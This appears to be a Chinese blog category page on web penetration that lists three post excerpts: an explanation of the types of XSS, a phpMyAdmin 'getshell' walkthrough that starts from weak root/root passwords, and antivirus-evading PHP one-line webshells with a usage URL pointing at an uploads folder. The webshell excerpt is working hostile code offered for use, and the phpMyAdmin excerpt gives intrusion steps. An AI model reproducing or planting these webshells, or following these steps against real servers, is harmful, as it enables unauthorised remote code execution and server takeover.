![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
Web渗透
文章平均质量分 56
记录Web渗透相关的知识
Blaov
这个作者很懒,什么都没留下…
展开
-
从前端页面渲染了解xss的三种区别
渲染流程要想理解DOM型的xss首先得先了解前端页面的渲染过程。前端页面接收到服务器返回的html文档后,进行如下的操作。三种xss的区别先谈谈反射型xss与存储型xss。形成原因:都是因为服务器没有对用户的输入以及自身输出的数据进行检查、过滤。区别:它们区别是存储型xss会把数据存入数据库当中。而反射型xss是非持久化的。利用:例如存储型xss容易出现在留言板中,凡是浏览了此留言板都会受到xss攻击,大量用户cookie被窃取。而反射型xss一般容易出现在搜索页面,它是非持久化的,需要欺骗用原创 2021-03-28 11:02:47 · 1246 阅读 · 0 评论 -
phpmyadmin的getshell
在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录(可试下:http://ip:端口/phpmyadmin/ )时,进而通过弱口令(可以直接尝试下账号root密码root)或者暴力破解进入管理后台之后,有多种方法进行getshell。第一步:获得网站真实路径 1.执行select @@basedir; 这个语句是利用 Mysql 的特性,输出绝对路径。 2.phpinfo() 3.构造报错页面(页面访问报错,sql注入报错,文件原创 2021-03-25 11:14:46 · 250 阅读 · 0 评论 -
免杀一句话
<?phparray_map($_GET[func], array($_POST[cmd]));?>利用方式http://localhost/dvwa/hackable/uploads/nb.php?func=assert 密码为cmd-----------------------------------------------------------------------------------------<?php$_GET['a']($_POST['b']);原创 2021-03-25 11:13:42 · 339 阅读 · 0 评论